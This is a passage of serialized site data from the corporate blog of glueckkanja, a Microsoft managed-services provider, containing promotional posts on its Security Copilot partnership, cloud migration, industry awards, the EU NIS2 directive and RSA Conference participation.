It combines an advanced Large Language Model (LLM) with a security-specific model, enriched by Microsoft's unique global cyber threat intelligence and more than 65 trillion daily signals.",[186,4980,4982],{"id":4981},"about-glueckkanja","About glueckkanja",[12,4984,4985],{},"glueckkanja, a renowned Cloud Managed Service Provider, is a top Microsoft partner offering comprehensive cloud solutions. With a unified blueprint approach, glueckkanja uses Infrastructure as Code to migrate and support customer infrastructures in the cloud.",[12,4987,4988],{},"Focusing on the secure and reliable operation of Workplace Solutions, Azure Services, and Security Infrastructures, glueckkanja serves both medium-sized and large enterprises. glueckkanja's Cloud Security Operations Center continuously protects customer infrastructures, capable of combating incidents and enforcing protection strategies. With a 24/7 Incident Response and APT team, glueckkanja ensures customers receive immediate emergency assistance and defense against cyber threats, keeping their infrastructure up to date with the latest security standards.",[12,4990,4991],{},"To ensure a seamless cloud-native Microsoft experience, glueckkanja has developed its own products. These tools enable a fully protected, completely cloud-centric infrastructure. Their product range includes KONNEKT for local work with Office 365 data, RADIUSaaS and SCEPman for serverless secure network authentication, RealmJoin for cloud software distribution, and Unified Contacts for simplified contact search in Microsoft Teams.",[12,4993,4994],{},"glueckkanja was among the first partners globally to receive the Microsoft Verified Managed Extended Detection and Response (MXDR) designation. With a team of nearly 200 experts, glueckkanja was named Microsoft Worldwide Partner of the Year in 2017, 2019, 2020, 2022, and 2023. Since 2019, glueckkanja has consistently topped the ISG Microsoft 365 Germany quadrant. 
Moreover, with its innovations, glueckkanja is among the TOP 100 companies in Germany, and an impressive rating of 4.8/5 on kununu solidifies its reputation as a leading employer in the SME sector.",{"title":65,"searchDepth":111,"depth":111,"links":4996},[4997],{"id":4981,"depth":329,"text":4982},{"lang":2171,"titleClass":2173,"date":4999,"categories":5000,"blogtitlepic":5001,"socialimg":5002,"customExcerpt":5003,"keywords":5004,"hreflang":5005},"2023-11-15",[2962],"head-security-copilot","/blog/heads/head-security-copilot.jpg","glueckkanja announced today that Microsoft has selected the company for the Microsoft Security Copilot Partner Private Preview. With its expertise in Microsoft security technologies, glueckkanja will help shape this AI-driven security initiative. The company will work closely with Microsoft's product teams to support the product development of Security Copilot in various ways. This collaboration is a significant milestone in glueckkanja's efforts to offer its customers innovative and secure solutions.","Microsoft Security Copilot, AI in Cybersecurity, Cybersecurity Solutions, Microsoft Security Technologies, Security Copilot Development, AI-Powered Security Product, Cyber Threat Response, Global Threat Intelligence, Tech Innovation in Security, Advanced Large Language Model, Microsoft Ignite, Microsoft Copilot Flight 
Engineers",[5006,5008],{"lang":2171,"href":5007},"/blog/corporate/2023/11/microsoft-security-copilot-partner-en",{"lang":2263,"href":5009},"/blog/corporate/2023/11/microsoft-security-copilot-partner-es","/posts/2023-11-15-microsoft-security-copilot-partner",{"title":4956,"description":4962},"posts/2023-11-15-microsoft-security-copilot-partner",[2962,2176,5014],"Copilot","vtutcZ2OhoJgRTDbGJ_xZd0CcBDXoMB75EcvoA-6B1k",{"id":5017,"title":5018,"author":5019,"body":5020,"cta":2166,"description":5024,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":5054,"moment":5055,"navigation":2181,"path":5064,"seo":5065,"stem":5066,"tags":5067,"webcast":2168,"__hash__":5071},"content_en/posts/2023-11-26-cloud-migration.md","Cloud Migration is More Than Just 'Lift and Shift'",[2401],{"type":9,"value":5021,"toc":5049},[5022,5025,5029,5032,5036,5039,5043,5046],[12,5023,5024],{},"Simply relocating servers to the cloud, known as lift-and-shift, is often not the optimal strategy. Rather, it is about adapting services to modern requirements and optimizing them in the course of the migration. Instead of limiting oneself to traditional IaaS solutions such as virtual servers, Platform-as-a-Service (PaaS) solutions should be considered. These make it possible to focus entirely on the operation of applications, as infrastructure operations are no longer required. A good example of this is the migration of databases, which can be scaled and provided more easily in the cloud. The provision of web services such as IIS or Apache servers is also easy and efficient with Azure PaaS solutions. These solutions offer an efficient alternative for meeting the above requirements simply and cost-effectively.",[186,5026,5028],{"id":5027},"databases-in-azure","Databases in Azure",[12,5030,5031],{},"For example, existing on-premises SQL database servers or clusters can be replaced by Azure SQL Database or Azure Managed Instance Services. 
These cloud services enable simple, globally distributed deployment. They also offer the flexibility to react quickly to growing requirements. This includes both the ability to reduce and increase capacity without having to purchase new, expensive on-premises hardware. However, careful planning is essential for a successful transition. A clear goal must be defined and set together with the customer and the business.",[186,5033,5035],{"id":5034},"web-services-in-azure","Web Services in Azure",[12,5037,5038],{},"In Azure Web Services, web applications and container solutions can be implemented without the need for a virtual machine (VM) with Apache, IIS or similar systems, as was previously the case. This significantly reduces maintenance costs. In addition, the numerous functions of these cloud services simplify processes such as release management. A good example of this is the deployment slots, which offer new possibilities for release management.",[186,5040,5042],{"id":5041},"container-solutions-in-azure","Container Solutions in Azure",[12,5044,5045],{},"In order to implement complex application scenarios, it is not absolutely necessary to use a large number of virtual machines (VMs) or individual VMs with many services. Container solutions, some of which are offered directly by manufacturers in the Azure Marketplace, offer a flexible and reliable alternative. These solutions do not necessarily require a dedicated Kubernetes cluster, which is often too large for the actual use case. Azure provides various services as required, such as Azure Container Apps or Azure Container Instances. These allow customers to gain initial experience with container solutions. As demand increases, consideration can later be given to setting up their own Kubernetes instance.",[12,5047,5048],{},"Cloud migration goes far beyond the simple lift-and-shift approach. It is about strategic adjustments and the use of advanced cloud solutions to optimize business processes. 
What is your experience with cloud migration? For further discussion or to learn how cloud technologies can transform your business processes, please contact us. We look forward to discussing various options and strategies with you.",{"title":65,"searchDepth":111,"depth":111,"links":5050},[5051,5052,5053],{"id":5027,"depth":329,"text":5028},{"id":5034,"depth":329,"text":5035},{"id":5041,"depth":329,"text":5042},{"lang":2171,"titleClass":2173,"date":5055,"categories":5056,"blogtitlepic":5057,"socialimg":5058,"customExcerpt":5059,"keywords":5060,"hreflang":5061},"2023-11-26",[4232],"head-cloud-migration","/blog/heads/head-cloud-migration.jpg","Companies decide to migrate to the cloud for various reasons. A common motivation is the strategic alignment of the company to preferably deploy workloads in the cloud in the future. Another reason can be the limited space or outdated infrastructure in traditional on-premises data centers. Cloud migration becomes particularly attractive when it involves the rapid and global integration of new services. 
This is where the strength of the Microsoft Cloud becomes evident, offering extensive resources and services that would only be feasible on-premises with considerable effort and cost.","Cloud Migration, Azure Solutions, IT Infrastructure, Cloud Strategy, Lift and Shift, PaaS, IaaS, Azure SQL Database, Azure Managed Instance, Container Solutions, Azure Web Services, Release Management, Kubernetes, Scalability, On-Prem to Cloud, Cloud Integration, Cloud Optimization, Database Migration, Web Service Migration, Cloud Infrastructure",[5062],{"lang":2260,"href":5063},"/blog/azure/infrastruktur/cloud/2023/11/cloud-migration","/posts/2023-11-26-cloud-migration",{"title":5018,"description":5024},"posts/2023-11-26-cloud-migration",[4232,5068,5069,5070,3661],"IaaS","PaaS","Infrastructure","10WKIwP4UTcRMhw-o3t-RdZnd1qGBC53fBTTtiVWA6w",{"id":5073,"title":5074,"author":5075,"body":5076,"cta":2166,"description":5080,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":5092,"moment":5093,"navigation":2181,"path":5109,"seo":5110,"stem":5111,"tags":5112,"webcast":2168,"__hash__":5114},"content_en/posts/2024-03-13-mssp-2024.md","After the Oscars, it's time for the MSSP!",[2461],{"type":9,"value":5077,"toc":5090},[5078,5081,5084,5087],[12,5079,5080],{},"The Microsoft Security Service Provider (MSSP) Award is recognized as one of the most significant accolades within the vital domain of cybersecurity. This year marks the fifth instance of honoring Microsoft Partners for their exceptional contributions and achievements in cyber security. What distinguishes the MSSP Award as particularly unique is the fact that all finalists are members of the Microsoft Intelligent Security Association (MISA) and are Managed Security Service Providers that have incorporated their security solutions within Microsoft's security technology. 
Securing a spot on the shortlist signifies triumph over a global array of industry leaders, positioning these finalists among the elite in the security sector.",[5082,5083],"quotes",{":quotes":5082},[12,5085,5086],{},"Employees of Microsoft and MISA-affiliated companies have until March 22, 2024, to cast their votes for their preferred candidates on the shortlist. The Microsoft Security Excellence Awards ceremony, introducing new categories this year, is scheduled for May 6, 2024, during the RSA Conference, held not too far from Hollywood, in San Francisco.",[12,5088,5089],{},"In additional positive news, we are pleased to announce the results of our CSOC Customer Poll 2023. An overwhelming 100 percent of respondents expressed their satisfaction with the resources provided by our CSOC to meet their security requirements, with 87 percent also very satisfied with the expertise of our team. This feedback is particularly gratifying for us, as it comes directly from those we strive to serve every day: our clients.",{"title":65,"searchDepth":111,"depth":111,"links":5091},[],{"lang":2171,"titleClass":2173,"date":5093,"categories":5094,"blogtitlepic":5095,"socialimg":5096,"customExcerpt":5097,"keywords":5098,"hreflang":5099,"quotes":5104},"2024-03-13",[2962],"head-finalist-mssp","/blog/heads/head-finalist-mssp.png","glueckkanja finds itself once again on the shortlist for the 2024 MSSP of the Year Awards! 
Fresh off applauding Christopher Nolan, Cillian Murphy, Emma Stone, and the blockbuster Oppenheimer in L.A., we have another reason for genuine award excitement: We, at glueckkanja, are finalists for the Security MSSP of the Year Award 2024!","MSSP, MSSP of the Year Awards 2024, Security MSSP, Cyber Security, Microsoft Partner, MISA, Managed Security Service Providers, Microsoft Security Technology, Shortlist, Security Excellence Awards, RSA Conference, San Francisco, CSOC Customer Poll 2023, Security Requirements, Expertise",[5100,5102],{"lang":2260,"href":5101},"/blog/corporate/2024/03/mssp-2024",{"lang":2263,"href":5103},"/blog/corporate/2024/03/mssp-2024-es",{"items":5105},[5106],{"text":5107,"name":2209,"company":5108,"img":2207,"alt":2209},"Our employees are the cornerstone of our success. Customers value the technical expertise and personal interaction with our staff, which fosters long-term loyalty to our service. Microsoft has recognized this blend of proficiency and passion for innovation for the second consecutive year, a distinction that fills us with immense pride.","Security Lead","/posts/2024-03-13-mssp-2024",{"title":5074,"description":5080},"posts/2024-03-13-mssp-2024",[2972,2971,2176,5113],"Misa","R-eypOzBbW89TQqmOab23QmqTgZV14U7OVnWtjOuRdY",{"id":5116,"title":5117,"author":5118,"body":5119,"cta":2166,"description":5123,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":5249,"moment":5251,"navigation":2181,"path":5294,"seo":5295,"stem":5296,"tags":5297,"webcast":2168,"__hash__":5301},"content_en/posts/2024-04-21-nis2.md","Are you ready for NIS2?",[2209],{"type":9,"value":5120,"toc":5243},[5121,5124,5127,5131,5133,5136,5155,5158,5161,5165,5167,5170,5184,5190,5194,5196,5199,5202,5205,5219,5223,5225,5228,5231],[12,5122,5123],{},"Bad news first: the updated version of the EU Network and Information Security Directive (NIS2 Directive) must be implemented by EU member states by October 17, 2024. 
Your company should comply with the numerous requirements of NIS2 by then at the latest - otherwise you could face hefty fines. Also, the management will be personally liable for violations of the directive.",[12,5125,5126],{},"The good news: If you are already using security solutions from Microsoft, you and your company may not be missing much to meet the complex requirements. But first things first.",[41,5128,5130],{"id":5129},"what-is-nis2-all-about","What is NIS2 all about?",[12,5132,31],{},[12,5134,5135],{},"Every year, data security incidents cause massive economic damage. Attacks on companies are becoming more frequent, more complex and therefore more dangerous. At the same time, networks are becoming more vulnerable in view of remote working and business activities in an increasingly connected world. This is where NIS2 comes in.",[5137,5138,420,5139,420,5144,420,5148,420,5152],"picture",{},[5140,5141],"source",{"media":5142,"srcSet":5143},"(min-width: 992px)","https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_1280/blog/pics/nis2-statistics-en.png",[5140,5145],{"media":5146,"srcSet":5147},"(min-width: 768px)","https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_800/blog/pics/nis2-statistics-mobile-en.png",[5140,5149],{"media":5150,"srcSet":5151},"(min-width: 576px)","https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_640/blog/pics/nis2-statistics-mobile-en.png",[2642,5153],{"src":5151,"alt":5154},"Statistics on data security incidents in Germany",[12,5156,5157],{},"The aim of the European directive is to harmonize the requirements for modern cybersecurity and its enforcement in the EU member states by setting a benchmark for minimum measures that companies must meet. NIS2 will thus be the most comprehensive European cybersecurity directive, covering 18 sectors.",[12,5159,5160],{},"Each country must transpose the directive into national law by October 2024, leaving room for national specifics. 
However, there are some minimum requirements that must be implemented in any case. As many countries currently (as of April 21, 2024) have no official draft legislation for the implementation of NIS2, it is not exactly easy for companies to prepare for the new directive. However, some important questions can already be answered.",[41,5162,5164],{"id":5163},"is-nis2-relevant-for-you","Is NIS2 relevant for you?",[12,5166,31],{},[12,5168,5169],{},"First of all, you should make sure that the NIS2 directive applies to you and your organization. This check does not happen automatically but must be carried out independently by companies. NIS2 divides companies into \"essential\" and \"important\" categories, some of which differ in terms of requirements. Also, the size and turnover of each organization plays a role in defining which criteria apply. This affects 18 sectors in total:",[5137,5171,420,5172,420,5175,420,5178,420,5181],{},[5140,5173],{"media":5142,"srcSet":5174},"https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_1280/blog/pics/nis2-sectors-en.png",[5140,5176],{"media":5146,"srcSet":5177},"https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_800/blog/pics/nis2-sectors-mobile-en.png",[5140,5179],{"media":5150,"srcSet":5180},"https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_640/blog/pics/nis2-sectors-mobile-en.png",[2642,5182],{"src":5180,"alt":5183},"Sectors affected by the NIS2 Directive",[12,5185,5186,5189],{},[251,5187,5188],{},"Please note:"," NIS2 affects the entire supply chain of a company. Therefore, the directive may apply to you even if you do not meet the respective criteria but are part of the supply chain of a company affected by NIS2.",[41,5191,5193],{"id":5192},"what-are-the-requirements-of-nis2","What are the requirements of NIS2?",[12,5195,31],{},[12,5197,5198],{},"NIS2 builds on previous legislation such as NIS1 and GDPR but adds numerous new requirements. 
The details of these new requirements will not be clear until a final draft of the legislation is published, but companies can already make comprehensive preparations now.",[12,5200,5201],{},"This is because NIS2 compliance is aligned with the same Zero Trust principles that Microsoft security solutions already take into account in order to provide solid protection against cyberattacks across the entire attack surface.",[12,5203,5204],{},"The policy is based on a number of principles that can be ensured either with Microsoft solutions or our services and products. We have summarized the most important principles here:",[5137,5206,420,5207,420,5210,420,5213,420,5216],{},[5140,5208],{"media":5142,"srcSet":5209},"https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_1280/blog/pics/nis2-principles-en.png",[5140,5211],{"media":5146,"srcSet":5212},"https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_800/blog/pics/nis2-principles-mobile-en.png",[5140,5214],{"media":5150,"srcSet":5215},"https://res.cloudinary.com/c4a8/image/upload/c_limit,q_auto,w_640/blog/pics/nis2-principles-mobile-en.png",[2642,5217],{"src":5215,"alt":5218},"NIS2 principles that can be fulfilled with Microsoft solutions or our products",[41,5220,5222],{"id":5221},"what-can-companies-do-now","What can companies do now?",[12,5224,31],{},[12,5226,5227],{},"With October approaching and the draft legislation still pending in many countries, it may be tempting for companies to speculate on possible grace periods from the government. However, the switch to NIS2-compliant systems can have potentially far-reaching consequences which need to be thoroughly planned, especially for organizations still working with legacy solutions.",[12,5229,5230],{},"Our clear recommendation is therefore not to wait any longer and to act now. 
Even before the NIS2 directive comes into effect, your organization will benefit from a solid risk management strategy, timely incident reporting, the ability to audit the supply chain and maintain a complete inventory of all digital assets.",[12,5232,5233,5234,5238,5239,5242],{},"We can support you not only in ",[2672,5235,5237],{"href":5236},"/en/security/security-consulting/","managing existing Microsoft security solutions",", but also in setting up additional protection mechanisms. Our specialized ",[2672,5240,3696],{"href":5241},"/en/security/cloud-security-operations-center/",", which is closely integrated with Microsoft security technologies, makes it possible to efficiently monitor and evaluate alerts, distinguish real threats from false positives and thus ensure comprehensive protection against digital threats. By integrating additional data sources (non-Microsoft data sources) and using advanced tools such as Microsoft Sentinel, we offer standardized security solutions that are precisely tailored to the specific needs of each customer.",{"title":65,"searchDepth":111,"depth":111,"links":5244},[5245,5246,5247,5248],{"id":5129,"depth":111,"text":5130},{"id":5163,"depth":111,"text":5164},{"id":5192,"depth":111,"text":5193},{"id":5221,"depth":111,"text":5222},{"lang":2171,"seoTitle":5250,"titleClass":2173,"date":5251,"categories":5252,"blogtitlepic":5253,"socialimg":5254,"customExcerpt":5255,"keywords":5256,"hreflang":5257,"scripts":5260,"contactInContent":5261},"NIS2 Directive 2024: Everything you need to know at a glance","2024-04-21",[2176],"head-nis2-en","/blog/heads/head-nis2-en.png","The new NIS2 directive places a whole range of requirements on companies and their cyber security - from minimum measures for cryptography and security procedures for data access to plans for dealing with security incidents. 
We provide you with an overview and answer the most important questions.","NIS2 directive, cybersecurity, EU directive implementation, network and information security, KRITIS operators, Microsoft security solutions, data security, compliance, cyberattacks, zero trust principles",[5258],{"lang":2260,"href":5259},"/blog/security/2024/04/nis2",{"slick":2181,"form":2181},{"quote":2181,"infos":5262},{"headline":5263,"subline":5264,"level":41,"textStyling":2204,"flush":2205,"person":5265,"form":5280},"Get in touch with us","Do you still have questions? We will be happy to help you get your company ready for the NIS2 directive.",{"image":2207,"mail":5266,"number":5267,"cloudinary":2181,"alt":2209,"name":2209,"quotee":2209,"quoteeTitle":5108,"quote":5268,"detailsHeader":5269,"details":5270},"sales@glueckkanja.com","+49694005520","NIS2 enhances security within EU enterprises. Ideally, cybersecurity should be strengthened out of conviction rather than merely compliance with regulations. Microsoft Security provides top-tier security solutions, and glueckkanja is your leading service provider in this field. We are here to assist you.","We look forward to hearing from you!",[5271,5276],{"text":5272,"href":5273,"details":5274,"icon":5275},"+49 69 4005520","tel:+49 69 4005520","Call now","site/phone",{"text":5277,"href":5278,"icon":5279},"info@glueckkanja.com","mailto:info@glueckkanja.com","site/mail",{"ctaText":5281,"cta":5282,"method":2169,"action":2216,"fields":5283},"Send",{"skin":2215},[5284,5285,5286,5287,5289,5291,5293],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":5288,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},"Your data will be stored by us to process and respond to your request. 
Further information on data protection can be found in our \u003Ca href=\"/en/privacy\">Privacy Policy\u003C/a>.",{"type":2241,"id":2247,"value":5290},"Anfrage NIS2 Beratung",{"type":2241,"id":2250,"value":5292},"nis2-consulting",{"type":2241,"id":2253},"/posts/2024-04-21-nis2",{"title":5117,"description":5123},"posts/2024-04-21-nis2",[5298,2176,5299,5300],"NIS2","EU Directive","Zero Trust","4p4d8CwsoJw8x7Nd0B758_Sj_G1Z4gbBfedhBQhbIjY",{"id":5303,"title":5304,"author":5305,"body":5306,"cta":2166,"description":5310,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":5497,"moment":5499,"navigation":2181,"path":5509,"seo":5510,"stem":5511,"tags":5512,"webcast":2168,"__hash__":5513},"content_en/posts/2024-04-25-isg.md","ISG once again honors glueckkanja",[2461],{"type":9,"value":5307,"toc":5490},[5308,5311,5315,5317,5320,5323,5326,5330,5332,5338,5341,5371,5375,5377,5383,5386,5406,5410,5412,5418,5421,5455,5459,5461,5467,5470],[12,5309,5310],{},"As a long-standing Microsoft partner, glueckkanja supports enterprises with comprehensive cloud solutions. As a leading IT service provider, it serves over 1,000 customers worldwide with its expertise — the experience and willingness to innovate make glueckkanja a valuable partner in the IT landscape. We are pleased to have been named a leader in our field by ISG Provider Lens™ once again for 2024.",[41,5312,5314],{"id":5313},"the-isg-provider-lens-study-2024","The ISG Provider Lens™ Study 2024",[12,5316,31],{},[12,5318,5319],{},"The ISG Provider Lens™ offers companies a comprehensive tool for decision-making, providing insights into positioning, relationships, and go-to-market considerations. The \"Microsoft Cloud Ecosystem\" study evaluates providers based on their product portfolios and competitive edge in the Microsoft Cloud ecosystem.",[12,5321,5322],{},"The evaluation matrix classifies vendors into four quadrants: Product Challenger, Contender, Market Challenger, and Leader. 
Leaders have a highly attractive product and service offering and a strong market and competitive position, which ensures both innovation and stability.",[12,5324,5325],{},"glueckkanja was recognized as a leader in four categories.",[41,5327,5329],{"id":5328},"managed-services-for-azure-large-enterprises","Managed Services for Azure — Large Enterprises",[12,5331,31],{},[12,5333,5334],{},[2642,5335],{"alt":5336,"src":5337},"Managed Services for Azure - Large Enterprises","https://res.cloudinary.com/c4a8/image/upload/blog/pics/isg24-azure-large-enterprises-en.png",[12,5339,5340],{},"In Managed Services for Azure, glueckkanja stands out as a leader in cloud management with a focus on automation, standardization, and continuous optimization. The use of Infrastructure as Code (IaC) for effective cloud strategy implementation is particularly noteworthy. According to ISG, the company has positioned itself as a future-oriented pioneer in Microsoft Cloud Management:",[1254,5342,5343,5349,5360],{},[1257,5344,5345,5348],{},[251,5346,5347],{},"Focus on Infrastructure as Code (IaC):"," glueckkanja uses IaC to provide efficient, fast and scalable cloud infrastructures. This methodology enables to define and manage infrastructures via automatable code scripts, resulting in significantly enhanced consistency and quality of cloud services. Adopting IaC over traditional scripting methods underlines glueckkanja’s modern approach to\ncloud management.",[1257,5350,5351,5354,5355,5359],{},[251,5352,5353],{},"Integration with security and compliance standards:"," glueckkanja’s commitment to high security and compliance standards, including ISO 27001, positions it as a trusted partner for cloud services. 
Aligning with the",[2672,5356,5358],{"href":5357},"/en/azure/cloud-adoption-framework","Microsoft Cloud Adoption Framework"," and Well-Architected Framework forms the foundation for developing and optimizing customer-specific cloud strategies, creating a comprehensive framework for compliance with cloud management best practices.",[1257,5361,5362,5365,5366,5370],{},[251,5363,5364],{},"Cloud Competence Center (CCC):"," By offering the ",[2672,5367,5369],{"href":5368},"/en/azure/cloud-competence-center","Cloud Competence Center",", glueckkanja emphasizes the importance of continuous improvement and adaptation to organizational needs. The CCC serves as a consulting and support platform for developing cloud strategies and promotes a culture of innovation.",[41,5372,5374],{"id":5373},"managed-services-for-azure-midmarket","Managed Services for Azure — Midmarket",[12,5376,31],{},[12,5378,5379],{},[2642,5380],{"alt":5381,"src":5382},"Managed Services for Azure - Midmarket","https://res.cloudinary.com/c4a8/image/upload/blog/pics/isg24-azure-midmarket-en.png",[12,5384,5385],{},"As a recognized and leading German provider of Managed Services on the Azure platform, glueckkanja maintains its top position this year. The company introduces enterprise security standards to the midmarket and excels with fast, high-quality cloud management solutions:",[1254,5387,5388,5394,5400],{},[1257,5389,5390,5393],{},[251,5391,5392],{},"Understanding SMEs:"," glueckkanja understands SMEs’ unique challenges and needs in cloud management. Leveraging code-based deployment (IaC) enables fast and efficient provision of cloud infrastructures tailored to SMEs’ requirements and resources. 
This methodology supports SMEs in scaling their IT infrastructures flexibly and cost-effectively.",[1257,5395,5396,5399],{},[251,5397,5398],{},"High-level security and compliance standards:"," Especially for SMEs, where resources may be limited, partnering with a provider that meets the highest security and compliance requirements is imperative. glueckkanja attaches great importance to adhering to standards such as ISO 27001, follows frameworks such as the Microsoft Cloud Adoption Framework and the Well-Architected Framework and even goes beyond them.",[1257,5401,5402,5405],{},[251,5403,5404],{},"Consulting and continuous improvement:"," Through the Cloud Competence Center (CCC), glueckkanja specifically addresses the needs of midsize companies. The CCC offers specialized consulting and support in developing and implementing cloud strategies.",[41,5407,5409],{"id":5408},"microsoft-365-services-large-enterprises","Microsoft 365 Services — Large Enterprises",[12,5411,31],{},[12,5413,5414],{},[2642,5415],{"alt":5416,"src":5417},"Microsoft 365 Services - Large Enterprises","https://res.cloudinary.com/c4a8/image/upload/blog/pics/isg24-m365-large-enterprises-en.png",[12,5419,5420],{},"glueckkanja excels with efficient and secure services that standardize digitalization in large enterprises while considering individual compliance and governance requirements. In this regard, leading ISG analyst Axel Oppermann states, \"glueckkanja stands out as a leading Microsoft security partner in Germany with innovative IT solutions aimed at optimizing and securing modern workplaces.\"",[1254,5422,5423,5434,5444],{},[1257,5424,5425,5428,5429,5433],{},[251,5426,5427],{},"Innovative workplace design:"," glueckkanja empowers users in their daily work and working environment by implementing ",[2672,5430,5432],{"href":5431},"/en/workplace/managed-workplace/","managed workplaces"," that fully integrate Microsoft 365 and Identity Services. 
This service enables location-independent work with up-to-date software and always ensures security. It is available on both Windows and Apple systems.",[1257,5435,5436,5439,5440,5443],{},[251,5437,5438],{},"Comprehensive cloud security:"," glueckkanja offers a comprehensive security solution from the cloud, using Entra ID and Windows Hello authentication technology on Windows Enterprise Clients, protected by Microsoft 365 Defender. Integrating Autopilot into Microsoft Intune, supplemented by ",[2672,5441,2677],{"href":5442,"target":4914},"https://www.realmjoin.com",", optimizes IT tasks and increases IT department productivity.",[1257,5445,5446,5449,5450,5454],{},[251,5447,5448],{},"Pioneering in Windows 365 Cloud PC development and Microsoft 365 integration:"," The ",[2672,5451,5453],{"href":5452},"/en/workplace/windows365-cloud-pc/","Windows 365 Cloud PC"," offers a pioneering solution that provides a complete Windows operating system from the cloud, combining Microsoft 365 and Windows 365 from a single source. This technology allows for rapid scaling and immediate operational readiness. Glueckkanja’s involvement in development and early-stage customer projects underlines its role as an innovative pioneer.",[41,5456,5458],{"id":5457},"microsoft-365-services-midmarket","Microsoft 365 Services — Midmarket",[12,5460,31],{},[12,5462,5463],{},[2642,5464],{"alt":5465,"src":5466},"Microsoft 365 Services - Midmarket","https://res.cloudinary.com/c4a8/image/upload/blog/pics/isg24-m365-midmarket-en.png",[12,5468,5469],{},"Specializing in modern workplace solutions and cloud infrastructures, glueckkanja effectively and securely supports mid-sized businesses in their digital transformation. The company emerges as a leader with its offerings of highly secure and efficient digital workplace solutions for the midmarket. 
Expertise in Managed Workplaces and innovative integrations set new standards:",[1254,5471,5472,5478,5484],{},[1257,5473,5474,5477],{},[251,5475,5476],{},"A pioneer in security and digitalization:"," As a leading force in Microsoft security in Germany, glueckkanja prioritizes maximizing the benefits and efficiency of digital workplaces with Microsoft 365 and beyond for its customers. The company sets itself apart through comprehensive support and customized solutions tailored to midsize companies’ requirements. The focus is always on security, quality and speed.",[1257,5479,5480,5483],{},[251,5481,5482],{},"Innovative cross-platform workplace design:"," glueckkanja promotes a modern working environment through Managed Workplaces and integrating Microsoft 365 and Identity Services. This enables efficient and secure working on Windows and Apple systems and increases employee flexibility and productivity.",[1257,5485,5486,5489],{},[251,5487,5488],{},"Pioneering role in Windows 365 Cloud PC and integration with Microsoft 365:"," Windows 365 Cloud PC offers a pioneering solution, providing a complete Windows operating system from the cloud. In other words, Microsoft 365 and Windows 365 from a single source. This technology enables rapid scaling and immediate operational readiness. 
glueckkanja played a key role in its development and gained experience in customer projects at an early stage, which underlines its role as an innovative pioneer.",{"title":65,"searchDepth":111,"depth":111,"links":5491},[5492,5493,5494,5495,5496],{"id":5313,"depth":111,"text":5314},{"id":5328,"depth":111,"text":5329},{"id":5373,"depth":111,"text":5374},{"id":5408,"depth":111,"text":5409},{"id":5457,"depth":111,"text":5458},{"lang":2171,"seoTitle":5498,"titleClass":2173,"date":5499,"categories":5500,"blogtitlepic":5501,"socialimg":5502,"customExcerpt":5503,"keywords":5504,"hreflang":5505,"scripts":5508},"ISG 2024: glueckkanja reaffirmed as Leader in Managed Services for Azure and Microsoft 365 Services","2024-04-24",[2962],"head-isg-2024","/blog/heads/head-isg-2024.png","Once again, glueckkanja has been confirmed as a leader in the sectors of 'Managed Services for Azure' and 'Microsoft 365 Services' for both the Midmarket and Large Enterprises categories in the ISG study. The report particularly highlights the company's innovative solutions that establish glueckkanja as a frontrunner for customers.","glueckkanja, Microsoft Partner, Managed Cloud Services, IT Service Provider, Microsoft Cloud Ecosystem, Azure Services, Cloud Security Solutions, ISG Provider Lens 2024, Microsoft 365 Services, Cloud Competence Center",[5506],{"lang":2260,"href":5507},"/blog/corporate/2024/04/isg",{"slick":2181,"form":2181},"/posts/2024-04-25-isg",{"title":5304,"description":5310},"posts/2024-04-25-isg",[2972,4401],"ukt4kGd_2-Shp9jmTaAEBTlcGXu08fxuuuN0TZlio2w",{"id":5515,"title":5516,"author":5517,"body":5518,"cta":2166,"description":5522,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":5583,"moment":5585,"navigation":2181,"path":5616,"seo":5617,"stem":5618,"tags":5619,"webcast":2168,"__hash__":5621},"content_en/posts/2024-04-30-gk-at-rsac.md","glueckkanja @ RSA 
Conference",[2461],{"type":9,"value":5519,"toc":5578},[5520,5523,5531,5535,5537,5545,5548,5552,5554,5557,5560,5566,5570,5572,5575],[12,5521,5522],{},"For over three decades, the RSA Conference has been a key force in the cybersecurity community. In a world where threats from attacks are growing every day, this conference has become essential for anyone dealing with online security. The well-known conference is always held in sunny California, and glueckkanja is once again participating.",[12,5524,5525,5526,5530],{},"As a member of the ",[2672,5527,5529],{"href":5528,"target":4914},"https://www.microsoft.com/de-de/security/business/intelligent-security-association","Microsoft Intelligent Security Association (MISA)",", an association of important security partners of Microsoft, we share the common goal of developing top-notch security solutions and protecting customers from threats.",[41,5532,5534],{"id":5533},"ai-in-focus-of-the-rsa-conference-2024","AI in focus of the RSA Conference 2024",[12,5536,31],{},[12,5538,5539,5540,5544],{},"This year, Microsoft is focusing the ",[2672,5541,5543],{"href":5542,"target":4914},"https://www.microsoft.com/en-us/security/blog/2024/04/04/explore-microsofts-ai-innovations-at-rsa-conference-2024","conference program"," entirely on Copilot for Security, the innovative AI solution designed to help security and IT experts identify undetected risks.",[12,5546,5547],{},"This is an exciting topic in the current discussion, which our Security Lead, Jan Geisbauer, is eager to engage with. In his session at the Microsoft booth (May 7, 17:30 - 17:50) during the RSA Conference, he will introduce this new technology, explore its capabilities, but also address its current limitations. 
